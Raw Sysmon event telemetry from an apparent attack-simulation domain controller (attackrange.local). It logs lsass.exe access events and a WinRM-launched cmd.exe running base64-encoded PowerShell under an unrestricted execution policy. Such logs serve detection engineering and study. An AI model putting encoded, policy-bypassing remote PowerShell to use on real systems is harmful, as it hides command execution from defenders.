13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-DC02-000000009001}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-851B-5FCF-D802-000000009001}42524524C:\Windows\system32\WinrsHost.exe{10ACEC4A-851B-5FCF-DC02-000000009001}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.581{10ACEC4A-851B-5FCF-DC02-000000009001}4916C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-851B-5FCF-D802-000000009001}4252C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.509{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B6-5FCF-0B00-000000009001}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.509{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-83B6-5FCF-0B00-000000009001}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.509{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1000-000000009001}1168C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.337{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tv2ywe2t.olk.ps12020-12-08 13:52:27.337 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.321{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-DB02-000000009001}3488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.305{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 